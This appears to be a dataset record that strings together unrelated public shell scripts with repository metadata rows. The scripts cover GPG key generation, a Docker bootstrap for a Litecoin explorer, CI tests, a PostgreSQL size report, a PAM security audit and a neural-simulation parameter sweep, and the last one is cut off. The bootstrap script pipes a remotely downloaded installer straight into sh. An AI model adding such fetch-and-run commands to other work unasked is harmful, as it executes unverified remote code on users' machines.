echo "Couldn't get Touchpad version. Try running xinput and manually editing this file"
exit 1
fi
if [[ -n $SLEEP_S ]]; then
sleep $SLEEP_S
fi
if [[ -n $ENABLE ]]; then
xinput set-prop "$TOUCHPAD" "Device Enabled" 1
else
xinput set-prop "$TOUCHPAD" "Device Enabled" 0
fi
fi
echo "Success!"
exit 0
| true |
a94f51e44309e1252e40c1b9eb55f0ba72ae200b | Shell | rsmitty/yubikey | /gpg.sh | UTF-8 | 1,790 | 3.625 | 4 | [] | no_license | #!/bin/bash
set -eou pipefail
while true; do
read -p "Enter Name: " name
echo
read -p "Enter Email: " email
echo
[[ ! -z "$name" ]] && break || echo "Name is empty string"
echo
[[ ! -z "$email" ]] && break || echo "Email is empty string"
echo
done
echo 'User info confirmed'
mkdir ~/gpg
# Generate master key
gpg --quick-gen-key "$name <$email>" ed25519 sign 365d
export KEYID=$(gpg --list-keys --with-colons $email | grep "^pub:" | cut -d: -f5)
export FPR=$(gpg --list-keys --with-colons $email | grep "^fpr:" | cut -d: -f10)
# Generate subkeys
gpg --quick-add-key $FPR cv25519 encr 365d
gpg --quick-add-key $FPR ed25519 auth 365d
gpg --quick-add-key $FPR ed25519 sign 365d
# Generate revocation certificate
gpg --generate-revocation --output ~/gpg/$FPR.revoke.asc $FPR
# Configure GPG
echo "default-key $FPR" >~/gpg/gpg.conf
# Test
export GPG_TTY=$(tty)
echo 'test' | gpg --clearsign --default-key $email
# Backup
gpg --armor --export-secret-keys $FPR > ~/gpg/$FPR.master.asc
gpg --armor --export-secret-subkeys $FPR > ~/gpg/$FPR.subkeys.asc
gpg --armor --export $FPR > ~/gpg/$FPR.pub.asc
gpg --export-ssh-key $FPR > ~/gpg/$FPR.ssh
tar -czpf ~/gpg/gnupg.tgz ~/.gnupg/
# Test
rm -rf ~/.gnupg/
mkdir ~/.gnupg/
chmod 700 ~/.gnupg/
cp ~/gpg/gpg.conf ~/.gnupg/
gpg --import ~/gpg/$FPR.master.asc ~/gpg/$FPR.subkeys.asc
echo
echo '#############################################'
echo 'All keys have been successfully generated!'
echo 'Proceed with the following:'
echo
echo 'Copy ~/gpg to a secure offline storage device'
echo
echo 'Copy the following to a secondary storage device to'
echo 'be transfered to a workstation:'
echo " - ~/gpg/gpg.conf"
echo " - ~/gpg/$FPR.pub.asc"
echo " - ~/gpg/$FPR.ssh"
echo '#############################################'
| true |
83bb22b8779dcb5da4fedad3a716c39cc559e063 | Shell | SNH48Live/KVM48 | /ci/script | UTF-8 | 2,445 | 3.34375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
[[ $PYTHON_VERSION == 3.* ]] || { echo "[ERROR] Invalid PYTHON_VERSION $PYTHON_VERSION" >&2; exit 1; }
mkdir -p data
cat > data/kvm48-config.yml <<'EOF'
group_id: 10
names:
- 陈观慧
- 陈思
- 戴萌
- 孔肖吟
- 李宇琪
- 莫寒
- 钱蓓婷
- 邱欣怡
- 吴哲晗
- 徐晨辰
- 许佳琪
- 张语格
span: 3
directory: /data
named_subdirs: true
update_checks: off
editor: cat
perf:
span: 7
EOF
image="snh48live/kvm48:master-python-$PYTHON_VERSION"
test_run() {
blue=$'\e[34m'
yellow=$'\e[33m'
red=$'\e[31m'
reset=$'\e[0m'
for try in {1..3}; do
echo -E "${blue}> kvm48 $@${reset}" >&2
sudo docker run -it --rm -v "$PWD/data:/data" "$image" "$@" || {
if [[ $try != 3 ]]; then
echo -E "${yellow}kvm48 $@ failed but it may be a temporary network issue; retrying in 30 seconds...${reset}" >&2
sleep 30
continue
else
if [[ -e data/m3u8.txt ]]; then
echo "${yellow}Testing reachability of remaining URLs in data/m3u8.txt...${reset}" >&2
m3u8s_are_broken=1
cut -f1 data/m3u8.txt | while read url; do
if curl -fI -m 10 $url; then
echo "${yellow}$url is fine${reset}" >&2
m3u8s_are_broken=0
fi
done
if (( m3u8s_are_broken )); then
echo "${yellow}Remaining M3U8 URLs are broken, not KVM48's fault.${reset}" >&2
return 0
fi
fi
echo -E "${red}kvm48 $@ failed after 3 tries${reset}" >&2
exit 1
fi
}
break
done
}
test_run --debug --config data/kvm48-config.yml
sudo rm -f data/*/*.mp4
# Test a known date range with both mp4 and m3u8 URLs to download.
test_run --debug --config data/kvm48-config.yml --from 2018-10-25 --to 2018-10-27
sudo rm -f data/*/*.mp4
test_run --debug --config data/kvm48-config.yml --mode perf --dry
# 2018-06-09 is a day with a short VOD: 其它/20180609 “砥砺前行” SNH48 GROUP 第五届偶像年度人气总决选启动仪式 第五届总选启动仪式.mp4
test_run --debug --config data/kvm48-config.yml --mode perf --from 2018-06-09 --to 2018-06-09
rm data/kvm48-config.yml
ls -lh data
sudo rm -rf data
| true |
cb64c50ac1f48858bfb13014491f7b70061d50c0 | Shell | Privex/ltcinsight-docker | /init.sh | UTF-8 | 10,794 | 3.703125 | 4 | [
"X11",
"MIT"
] | permissive | #!/usr/bin/env bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:${PATH}"
export PATH="${HOME}/.local/bin:/snap/bin:${PATH}"
cd "$DIR"
em() {
>&2 echo -e "$@"
}
hascmd() {
command -v "$@" &> /dev/null
}
has_cmd() { hascmd "$@"; }
autosudo() {
all_args=("$@")
first_el="${all_args[0]}"
last_els=("${all_args[@]:1:${#all_args[@]}}")
last_els_str="$(printf "%q " "${last_els[@]}")"
if (( EUID != 0 )); then
if hascmd sudo; then
sudo -- "$@"
_ret=$?
elif hascmd su; then
su -c "$first_el ${last_els_str}"
_ret=$?
else
em " [!!!] You're not root, and neither 'sudo' nor 'su' are available."
em " [!!!] Cannot run command: $first_el $last_els_str "
return 2
fi
else
env -- "$@"
_ret=$?
fi
return $_ret
}
: ${LTC_ENV="${DIR}/.env"}
: ${LTC_ENV_EXM="${DIR}/example.env"}
: ${LTC_COMPOSE="${DIR}/docker-compose.yml"}
: ${LTC_COMPOSE_EXM="${DIR}/bin.docker-compose.yml"}
: ${LTC_CADDY="${DIR}/caddy/Caddyfile"}
: ${LTC_CADDY_EXM="${DIR}/caddy/example.Caddyfile"}
: ${COMPOSE_VER="1.28.3"}
: ${COMPOSE_URL="https://github.com/docker/compose/releases/download/${COMPOSE_VER}/docker-compose-Linux-x86_64"}
if ! [[ -f "$LTC_ENV" ]]; then
em " [!!!] The env file '${LTC_ENV}' wasn't found. Copying example config '${LTC_ENV_EXM}'..."
>&2 cp -v "$LTC_ENV_EXM" "${LTC_ENV}"
fi
if ! [[ -f "$LTC_COMPOSE" ]]; then
em " [!!!] The docker compose file '${LTC_COMPOSE}' wasn't found. Copying binary image config '${LTC_COMPOSE_EXM}'..."
>&2 cp -v "$LTC_COMPOSE_EXM" "${LTC_COMPOSE}"
fi
if ! [[ -f "$LTC_CADDY" ]]; then
em " [!!!] The config file '${LTC_CADDY}' wasn't found. Copying example config '${LTC_CADDY_EXM}'..."
>&2 cp -v "$LTC_CADDY_EXM" "${LTC_CADDY}"
fi
source "${LTC_ENV}"
DST_TYPE="" PKG_MGR="" PKG_MGR_INS="" PKG_MGR_UP=""
hascmd apt-get && DST_TYPE="deb" PKG_MGR="apt-get"
[[ -z "$PKG_MGR" ]] && hascmd apt && DST_TYPE="deb" PKG_MGR="apt"
[[ -z "$PKG_MGR" ]] && hascmd dnf && DST_TYPE="rhel" PKG_MGR="dnf"
[[ -z "$PKG_MGR" ]] && hascmd yum && DST_TYPE="rhel" PKG_MGR="yum"
[[ -z "$PKG_MGR" ]] && hascmd pacman && DST_TYPE="arch" PKG_MGR="pacman"
[[ -z "$PKG_MGR" ]] && hascmd apk && DST_TYPE="alp" PKG_MGR="apk"
[[ -z "$PKG_MGR" ]] && hascmd brew && DST_TYPE="osx" PKG_MGR="brew"
if [[ -n "$PKG_MGR" ]]; then
if [[ "$DST_TYPE" == "deb" ]]; then
PKG_MGR_INS="${PKG_MGR} install -qy" PKG_MGR_UP="${PKG_MGR} update -qy"
elif [[ "$DST_TYPE" == "rhel" ]]; then
PKG_MGR_INS="${PKG_MGR} install -y" PKG_MGR_UP="${PKG_MGR} makecache -y"
elif [[ "$DST_TYPE" == "alp" ]]; then
PKG_MGR_INS="${PKG_MGR} add" PKG_MGR_UP="${PKG_MGR} update"
elif [[ "$DST_TYPE" == "arch" ]]; then
PKG_MGR_INS="${PKG_MGR} -S --noconfirm" PKG_MGR_UP="${PKG_MGR} -Sy --noconfirm"
elif [[ "$DST_TYPE" == "osx" ]]; then
PKG_MGR_INS="${PKG_MGR} install" PKG_MGR_UP="${PKG_MGR} update"
else
PKG_MGR=""
fi
fi
PM_UPDATED=0
_instpkg() {
if [[ -n "$PKG_MGR_UP" ]] && (( PM_UPDATED == 0 )); then
autosudo $PKG_MGR_UP
_ret=$?
if (( _ret )); then
em " [!!!] Non-zero return code from '$PKG_MGR_UP' - code: $_ret"
return $_ret
fi
em " +++ Successfully updated package manager '${PKG_MGR}'"
PM_UPDATED=1
fi
autosudo $PKG_MGR_INS "$@"
_ret=$?
if (( _ret )); then
em " [!!!] Non-zero return code from '$PKG_MGR_INS' - code: $_ret"
return $_ret
fi
em " +++ Successfully installed packages:" "$@"
return 0
}
instpkg() {
rets=0
for p in "$@"; do
_instpkg "$p"
_ret=$?
if (( _ret )); then
rets=$_ret
fi
done
return $rets
}
instpkg-all() {
_instpkg "$@"
}
autoinst() {
if hascmd "$1"; then
return 0
fi
em " [...] Program '$1' not found. Installing package(s):" "${@:2}"
instpkg "${@:2}"
}
autoinst git git
[[ "$(uname -s)" == "Linux" ]] && autoinst netstat net-tools
autoinst wget wget
autoinst curl curl
autoinst jq jq
[[ "$(uname -s)" == "Linux" ]] && autoinst iptables iptables || true
[[ "$DST_TYPE" == "arch" ]] && instpkg-all extra/fuse3 community/fuse-overlayfs bridge-utils
hascmd systemctl && autosudo systemctl daemon-reload
if ! hascmd docker; then
em " [!!!] Command 'docker' not available. Installing Docker from https://get.docker.com"
curl -fsS https://get.docker.com | sh
_ret=$?
if (( _ret )) || ! hascmd docker; then
em " [!!!] ERROR: Command 'docker' is still not available. Falling back to installing Docker via package manager (if possible)"
if autoinst docker docker.io; then
em " [+++] Successfully installed Docker via package 'docker.io'"
else
em " [!!!] ERROR: Failed to install package 'docker.io'. Possibly your system's repos list it under 'docker'..."
em " [!!!] Falling back to package name 'docker'..."
if autoinst docker docker; then
em " [+++] Successfully installed Docker via package 'docker'"
else
em " [!!!] CRITICAL ERROR !!!"
em " [!!!] We failed to install Docker via both Docker's auto-install script ( https://get.docker.com )"
em " [!!!] AND via your OS's package manager..."
em " [!!!] Please go to https://www.docker.com/get-started and lookup your operating system."
em " [!!!] You'll need to manually install Docker for your OS, and then re-run this script to try"
em " [!!!] setting up + installing + running Insight LTC via Docker for you."
em " NOTE: If you're not sure where this script is, it's located at: $0"
em " Full path: ${DIR}/$0"
em
exit 20
fi
fi
else
em " [+++] Successfully installed Docker via the official auto-installer script :)"
fi
fi
install() {
local is_verb=0
if [[ "$1" == "-v" || "$1" == "--verbose" ]]; then
is_verb=1
shift
fi
all_args=("$@")
first_els=("${all_args[@]::${#all_args[@]}-1}")
last_el="${all_args[-1]}"
autosudo cp -Rv "${first_els[@]}" "$last_el"
# If the last arg is a folder, then we need to get the file/folder names of
# the first arguments, then prepend them to the last argument (the dest. folder),
# so that we can chmod the files in the new location.
if [[ -d "$last_el" ]]; then
el_names=()
for f in "${first_els}"; do
el_names+=("${last_el%/}/$(basename "$f")")
done
autosudo chmod -Rv 755 "${el_names[@]}"
else
autosudo chmod -v 755 "$last_el"
fi
}
ins-compose() {
em " >>> Downloading docker-compose from URL: $COMPOSE_URL"
wget -O /tmp/docker-compose "$COMPOSE_URL"
em " >>> Attempting to install docker-compose into /usr/local/bin"
install /tmp/docker-compose /usr/local/bin/docker-compose
_ret=$?
[[ -f "/tmp/docker-compose" ]] && rm -f /tmp/docker-compose
return $_ret
}
if ! autoinst docker-compose docker-compose; then
em " >>> Detected error while installing docker-compose. Will attempt to install manually."
ins-compose
_ret=$?
if (( _ret == 0 )); then
em " [+++] Got successful return code (0) from ins-compose. Docker-compose should be installed."
else
em " [!!!] Got non-zero code from ins-compose (code: ${_ret}) - install may have errored..."
fi
fi
hascmd systemctl && autosudo systemctl daemon-reload
if [[ "$DST_TYPE" == "arch" ]]; then
em " >>> Arch Linux detected..."
em " >>> Stopping docker service..."
autosudo systemctl stop docker
em " >>> Waiting 10 seconds for Docker to fully shutdown and cleanup..."
sleep 10
em " >>> Reloading systemd"
autosudo systemctl daemon-reload
em " >>> Starting Docker service"
autosudo systemctl start docker
em " >>> Waiting 10 seconds for Docker to fully start up."
sleep 10
em " +++ Docker should now be ready."
em "\n\n"
em " # !!! !!! !!! !!!"
em " # !!! WARNING: On Arch Linux, Docker may not be able to automatically install and load the kernel"
em " # !!! modules that it requires to function after first being installed."
em " # !!!"
em " # !!! If you see a bunch of errors when this script tries to start the containers, then you likely"
em " # !!! need to upgrade your system (inc. kernel) using 'pacman -Syu' - and then reboot."
em " # !!!"
em " # !!! After rebooting, Docker's service should then be able to run just fine."
em " # !!! !!! !!! !!!\n\n"
sleep 5
fi
if hascmd systemctl; then
if autosudo systemctl status docker | head -n20 | grep -Eiq 'active:[ \t]+active( \(running\))?'; then
em " [+++] Service 'docker' appears to be active and running :)"
else
em " [!!!] Service 'docker doesn't appear to be running... Attempting to enable and start it..."
autosudo systemctl daemon-reload
autosudo systemctl enable docker
autosudo systemctl restart docker
em " [...] Waiting 5 seconds for docker service to start up..."
sleep 5
fi
elif hascmd service; then
em " [!!!] Warning: Your system doesn't have systemctl, but instead has 'service'. We may not be able to reliably check whether or not Docker is running."
em " [!!!] If you see errors while the script starts the Docker containers, check 'service docker status' to see if Docker is running."
em " [!!!] If the 'docker' service isn't running, try running 'service restart docker' and then run this script again."
em
if autosudo service docker status | grep -Eiq "active|running"; then
em " [+++] Service 'docker' appears to be active and running :) (fallback check via 'service' command)"
else
em " [!!!] Service 'docker doesn't appear to be running... Attempting to start it..."
autosudo service docker restart
em " [...] Waiting 5 seconds for docker service to start up..."
sleep 5
fi
else
em " [!!!] Warning: Your system doesn't have systemctl, nor 'service'. We cannot check whether or not Docker is running."
em " [!!!] If you see errors while the script starts the Docker containers, please ensure the 'docker' service is running,"
em " [!!!] using whatever service management tool your OS uses...\n"
fi
em " >>> Starting Insight Docker Containers using 'docker-compose up -d'"
autosudo docker-compose up -d
_ret=$?
exit $_ret
| true |
a93930e8d3f8d0b2e4c77b45b525669a17c266f5 | Shell | GLTSC/samaritan | /test/integration/proc/redis/run.sh | UTF-8 | 1,058 | 2.75 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash -eu
#
# Copyright 2019 Samaritan Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
readonly CUR_DIR=$(dirname "$0")
readonly DOCKER_REPO="samaritanproxy/sam-test"
readonly DOCKER_TAG="integration-$(basename $CUR_DIR)"
docker build -t "${DOCKER_REPO}:${DOCKER_TAG}" -f "${CUR_DIR}/Dockerfile" .
cmd="go test ${GOTEST_FLAGS:-""} ${CUR_DIR}"
docker run --rm \
-e GOPROXY="${GOPROXY:-}" \
-e GOFLAGS="${GOFLAGS:-}" \
"${DOCKER_REPO}:${DOCKER_TAG}" bash -c "$cmd"
| true |
5dc52c9303999e8afd86b5b49f9391e034f501e6 | Shell | sdothum/dotfiles | /bin/bin/functions/package/void/xb_check | UTF-8 | 656 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/dash
# sdothum - 2016 (c) wtfpl
# Package
# ══════════════════════════════════════════════════════════════════════════════
# ........................................................... Package management
usage() { usage: "$(basename $0) <package>*"; exit 1; }
[ $1 ] || usage
for i in $@ ;do xb Q $i >/dev/null || missing="$missing$i " ;done
# install missing packages
[ "$missing" ] && { ifno "install $missing" && exit 1; for i in $missing ;do xb S $i ;done }
# vim: set ft=sh: #
| true |
042f4ea28789fefc79e47f907de31c988105d59b | Shell | pablerass/dotfiles | /scripts/install-buttercup.sh | UTF-8 | 363 | 3.234375 | 3 | [] | no_license | #!/bin/bash -e
# Specify version
app=buttercup-desktop
ver=1.10.1
arch=amd64
package=${app}_${ver}_${arch}.deb
# Download deb packages
wget -N https://github.com/buttercup/buttercup-desktop/releases/download/v${ver}/${package}
# Install packages
sudo apt install gconf2 libappindicator1 libindicator7 -y
sudo dpkg -i $package
# Delete packages
rm -f $package
| true |
08f346677661d9174aad860013ceaf6f8755ff1d | Shell | NickSto/nstoler.com | /utils/psql-du.sh | UTF-8 | 1,393 | 4.15625 | 4 | [] | no_license | #!/usr/bin/env bash
if [ "x$BASH" = x ] || [ ! "$BASH_VERSINFO" ] || [ "$BASH_VERSINFO" -lt 4 ]; then
echo "Error: Must use bash version 4+." >&2
exit 1
fi
set -ue
Usage="Usage: \$ $(basename "$0") [-t] [-a]
Print the disk usage of each Postgres table.
-a: Include metadata tables (ones starting with \"django_\" and \"auth_\").
-t: Print as tab-delimited format, with 3 columns: timestamp, table name, and size in bytes."
function main {
# Get arguments.
all=
human="true"
while getopts ":ath" opt; do
case "$opt" in
a) all="true";;
t) human="";;
h) fail "$Usage";;
esac
done
pos1="${@:$OPTIND:1}"
pos2="${@:$OPTIND+1:1}"
now=$(date +%s)
if [[ "$human" ]]; then
format='pg_size_pretty('
format_end=')'
else
format=
format_end=
fi
echo "
SELECT relname AS \"relation\", ${format}pg_total_relation_size(C.oid)$format_end AS \"size\"
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname NOT IN ('pg_catalog', 'information_schema')
AND C.relkind <> 'i'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) DESC;" \
| psql -qtA -F $'\t' -d django \
| awk -F _ '"'"$all"'" || ($1 != "django" && $1 != "auth")' \
| awk '{if (!"'"$human"'") {printf("%d\t", '"$now"')} print $0}'
}
function fail {
echo "$@" >&2
exit 1
}
main "$@"
| true |
be3e33c922a11c6f0b31d09efd4a19358b95eeaf | Shell | antoniovizuete/git-ejercicios | /git-exercise-1/create.sh | UTF-8 | 152 | 2.625 | 3 | [] | no_license | #!/bin/bash
source ../_generic_create.sh
function _ex() {
echo "unu" > first.txt
echo "du" > second.txt
git add first.txt
}
_create _ex
| true |
50b1ac940c8553d32041ca5b2bfb98f9f686d71b | Shell | WilliamGrondin/TE-bot | /chromiummacro.sh | UTF-8 | 1,185 | 3.578125 | 4 | [] | no_license | #!/bin/bash
BASEDIR=$(dirname $0)
echo $BASEDIR
nbChromeUser=$1
echo "script nb-chrome-user"
#get links
wget --no-check-certificate -q https://raw.githubusercontent.com/WilliamGrondin/TE-bot/master/mylinks -O "$BASEDIR/links"
readarray -t links < "$BASEDIR/links"
linksLength=${#links[@]}
echo "Links : $linkLength"
for line in "${links[@]}";
do printf '%s\n' "$line";
done
#get country
readarray -t usersCountry < "$BASEDIR/countries"
#kill old process
killall -9 chromium-browser
killall -9 Xvfb
killall -9 sleep
sleep 2
#start virtual display
Xvfb :2 -screen 1 1024x768x16 -nolisten tcp & disown
sleep 2
#start chromium
rm -rf $BASEDIR/user*
for i in `seq 1 $nbChromeUser`
do
#recreate user dir
cp -r $BASEDIR/default-user $BASEDIR/user$i
echo "User$i country : ${usersCountry[$((i-1))]}"
sqlite3 $BASEDIR/user$i/Default/Local\ Storage/chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage "UPDATE ItemTable SET value=replace(value,'ca','${usersCountry[$((i-1))]}') WHERE key='be_rules';"
url="${links[RANDOM % linksLength]}"
echo "URL = $url"
chromium-browser --user-data-dir="$BASEDIR/user$i/" --display=:2.1 "$url" > /dev/null & disown
sleep 20
done
| true |
4320ba14236236a7ff9b6f7664f13a73572975bf | Shell | cloudtracer/lunar | /modules/audit_pam_wheel.sh | UTF-8 | 2,262 | 3.25 | 3 | [
"CC-BY-4.0"
] | permissive | # audit_pam_wheel
#
# PAM Wheel group membership. Make sure wheel group membership is required to su.
#
# Refer to Section(s) 6.5 Page(s) 142-3 CIS CentOS Linux 6 Benchmark v1.0.0
# Refer to Section(s) 6.5 Page(s) 165-6 CIS RHEL 5 Benchmark v2.1.0
# Refer to Section(s) 6.5 Page(s) 145-6 CIS RHEL 6 Benchmark v1.2.0
# Refer to Section(s) 5.6 Page(s) 257-8 CIS RHEL 7 Benchmark v2.1.0
# Refer to Section(s) 9.5 Page(s) 135-6 CIS SLES 11 Benchmark v1.0.0
# Refer to Section(s) 5.5 Page(s) 235-6 CIS Amazon Linux Benchmark v2.0.0
#.
audit_pam_wheel () {
if [ "$os_name" = "Linux" ]; then
funct_verbose_message "PAM SU Configuration"
check_file="/etc/pam.d/su"
search_string="use_uid"
if [ "$audit_mode" != 2 ]; then
echo "Checking: Wheel group membership required for su in $check_file"
total=`expr $total + 1`
check_value=`cat $check_file |grep '^auth' |grep '$search_string$' |awk '{print $8}'`
if [ "$check_value" != "$search_string" ]; then
if [ "$audit_mode" = "1" ]; then
insecure=`expr $insecure + 1`
echo "Warning: Wheel group membership not required for su in $check_file [$insecure Warnings]"
funct_verbose_message "" fix
funct_verbose_message "cp $check_file $temp_file" fix
funct_verbose_message "cat $temp_file |awk '( $1==\"#auth\" && $2==\"required\" && $3~\"pam_wheel.so\" ) { print \"auth\t\trequired\t\",$3,\"\tuse_uid\"; next }; { print }' > $check_file" fix
funct_verbose_message "rm $temp_file" fix
funct_verbose_message "" fix
fi
if [ "$audit_mode" = 0 ]; then
funct_backup_file $check_file
echo "Setting: Su to require wheel group membership in PAM in $check_file"
cp $check_file $temp_file
cat $temp_file |awk '( $1=="#auth" && $2=="required" && $3~"pam_wheel.so" ) { print "auth\t\trequired\t",$3,"\tuse_uid"; next }; { print }' > $check_file
rm $temp_file
fi
else
if [ "$audit_mode" = "1" ]; then
secure=`expr $secure + 1`
echo "Secure: Wheel group membership required for su in $check_file [$secure Passes]"
fi
fi
else
funct_restore_file $check_file $restore_dir
fi
fi
}
| true |
cdfd0caa6153c3071a12f23f3a201df10840567f | Shell | pragmagrid/lifemapper-compute | /src/futures/prepSrc.sh.in | UTF-8 | 389 | 3.203125 | 3 | [] | no_license | #!/bin/bash
# Purpose: Fetch futures source, backport of the concurrent.futures package from Python 3
DL_URL=https://files.pythonhosted.org/packages/47/04/5fc6c74ad114032cd2c544c575bffc17582295e9cd6a851d6026ab4b2c00
DL_PKG=@ARCHIVENAME@-@VERSION@.@TARBALL_POSTFIX@
get_source_files () {
echo "Fetch @ARCHIVENAME@ source code"
wget "$DL_URL/$DL_PKG"
}
### main ###
get_source_files
| true |
46eaa0cb309ef84105b6ea5ec7a3459d32c8279f | Shell | HEP-KBFI/stpol | /src/old_step3/resubmit_failed_task.sh | UTF-8 | 576 | 3.625 | 4 | [] | no_license | #!/bin/bash
#Resubmits the step3 job based on the failed slurm-JOBID.out file as the argument
if [ -z "$1" ]; then
echo "Usage: $0 /path/to/failed/slurm-12345.out"
echo "This script will look for the x* file in the slurm.out and resubmit the task based on the corresponding task_x*"
exit 1
fi
infile=`readlink -f $1`
TASKCODE=$(grep "Input file is" $infile | grep -oe "x[0-9]*")
JOBID=$(grep "SLURM job ID" $infile | grep -oe "=[0-9]*")
JOBID=${JOBID:1}
basedir=$(dirname $infile)
rm $basedir/*$JOBID*
SUBCMD=`cat $basedir/task_$TASKCODE`
cd $basedir
eval $SUBCMD
| true |
2b773eb6a446082aaa737183fbefe7c8664ae48a | Shell | alphagov/govuk-puppet | /modules/govuk/templates/usr/local/bin/es-rotate-passive-check.erb | UTF-8 | 931 | 3.828125 | 4 | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/bin/bash
# Redirect stdout and stderr to syslog
exec 1> >(/usr/bin/logger -s -t $(basename $0)) 2>&1
#FIXME: 2014-01-12 - Ideally this should be 21 days - need to fix logstasher gem first
ARGS='--delete-old --delete-maxage <%= @indices_days_to_keep %> --optimize-old --optimize-maxage 1 logs'
CMD="/usr/local/bin/es-rotate"
function send_to_monitoring() {
local MESSAGE=$1
local CODE=$2
printf "<%= @ipaddress_eth0 %>\tes-rotate\t${CODE}\t${MESSAGE}\n" | /usr/sbin/send_nsca -H <%= @alert_hostname %> >/dev/null
}
echo "Running es-rotate at `date`"
if [ -e "${CMD}" ]; then
${CMD} ${ARGS}
CODE=$?
if [ "${CODE}" -eq 0 ]; then
send_to_monitoring "es-rotate OK" 0
else
send_to_monitoring "es-rotate exited abnormally" 1
echo "es-rotate exited abnormally"
exit $CODE
fi
echo "Finished at `date`"
exit $CODE
else
send_to_monitoring "es-rotate: command '${CMD}' not found" 3
exit 1
fi
| true |
9fc50cb63d5518e9166d5549ca95190c79a006c3 | Shell | ameliegruel/VisualAttention_DVS | /Attention model with Matlab/HyperParametrage.sh | UTF-8 | 7,094 | 3.0625 | 3 | [] | no_license | #!/bin/bash
now=`date +"%F_%H-%M-%S"`
start=`date +"%s"`
mkdir Results/HyperSimu_$now
touch Results/HyperSimu_$now/Simulation_$now.csv
echo "Simulation;Video;Category;Sample;Bigger timestamp;" >> Results/HyperSimu_$now/Simulation_$now.csv
# parameters Attention
thresholdAttention=(25 50 100 108.1 110 125 150 200) #108.1
tmAttention=(0.2 2 5 10 15 20 50 100 150) #2
# parameters Inter
thresholdInter=(10 25 50 100 150 200 250 252.7 300) #article: 252.7 / code: 25
tmInter=(0.000025 0.00025 0.0025 0.025 0.25 2.5 10 25 50 100 150) #0.025
nbInterNeurons=(60 100 150 200) #60
# parameters Output
thresholdOutput=(5 10 14 15 20 25 30 50 100 140) #article: 140 / code: 25
tmOutput=(0.03 0.3 3 30 100 240 300 500) #240
nbOutputNeurons=(5 10 11 12 13 14 15 16 17 18 19 20 25 30)
# save parameters
touch Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Matlab script:
# echo "Simulation;Number of active output neurons;Activation rate of output layer;Rate coding;Rank order coding - Accuracy;Rank order coding - Specificity;threshold Attention;tm Attention;threshold Intermediate;tm Intermediate;neurons Intermediate;threshold Output;tm Output;neurons Output;" > Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Random Forest Classifier (Scikit-learn):
echo "Simulation;Rate coding;Rank order coding;Latency coding;threshold Attention;tm Attention;threshold Intermediate;tm Intermediate;neurons Intermediate;threshold Output;tm Output;neurons Output;" > Results/HyperSimu_$now/Parameters_Simu_$now.csv
# define matlab commands
import_data="gesturedata=importdata('data/gesture_data.csv');samplestime=importdata('data/samples_time.csv');save('data/gesture_data.mat','gesturedata','-v7.3');"
run_scripts="run('Attention_Neuron/runScriptDN.m');run('Intermediate_Layer/runScriptL1.m');run('Output_Layer/runScriptL2.m');"
run_accuracy="" # "run('compute_accuracy.m');"
exit="exit;"
# get categories
echo "Categories: $@" # use all parameters given as input, as categories to test
arg_cat=true
cats=""
arg_loop=false
loop=1
arg_simu=false
nbSimu=3
for arg in "$@"
do
if [[ "$arg" == "-l" ]]
then
arg_cat=false
arg_simu=false
arg_loop=true
elif [[ "$arg" == "-hp" ]]
then
arg_cat=false
arg_loop=false
arg_simu=true
elif [[ "$arg_cat" == true && $arg =~ ^[0-9]+$ ]]
then
cats=$cats$arg" "
elif [[ "$arg_loop" == true && $arg =~ ^[0-9]+$ ]]
then
loop=$arg
elif [[ "$arg_simu" == true && $arg =~ ^[0-9]+$ ]]
then
nbSimu=$arg
fi
done
echo "Categories:" $cats "over" $loop "loop(s)"
simu_parameters=""
categories=""
nbcat=0
for c in ${cats[@]}
do
nbcat=$((nbcat+1))
simu_parameters=$simu_parameters"SIMU.cat$nbcat=$c;"
l=0
while ((l < loop))
do
categories=$categories$c";"
l=$((l+1))
done
done
simu_parameters=$simu_parameters"SIMU.nb_categories=$nbcat;"
# get input data using tonic
start=`date +"%s"`
python3 getDVS128Gesture.py $@ | tee tmp.txt
fin=`date +"%s"`
cat tmp.txt | grep "^$\|Bigger\|Sample:\|//" | sed 's/^$/?/g' | sed "s/\/\//1/g" | grep -o '[0-9]*\|?' | tr '\n' ';' | sed "s/?;/\n/g" >> Results/HyperSimu_$now/Simulation_$now.csv
rm tmp.txt
#
s=1
# main loops
while ((s <= nbSimu))
do
echo "// SIMULATION LOOP $s //"
# save data
mkdir Results/HyperSimu_$now/HyperSimu$s
touch Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "Categories;;$categories" > Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "Sample times;"`cat data/samples_time.csv` >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "" >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "timestamps;neuron tags" >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
# set random variables
# tmA=2
# thA=-25
# tmI=0.025
# thI=-25
# nbI=60
# tmO=240
# thO=-25
# nbO=5
tmA=${tmAttention[$RANDOM % ${#tmAttention[@]}]}
thA=${thresholdAttention[$RANDOM % ${#thresholdAttention[@]}]}
tmI=${tmInter[$RANDOM % ${#tmInter[@]}]}
thI=${thresholdInter[$RANDOM % ${#thresholdInter[@]}]}
nbI=${nbInterNeurons[$RANDOM % ${#nbInterNeurons[@]}]}
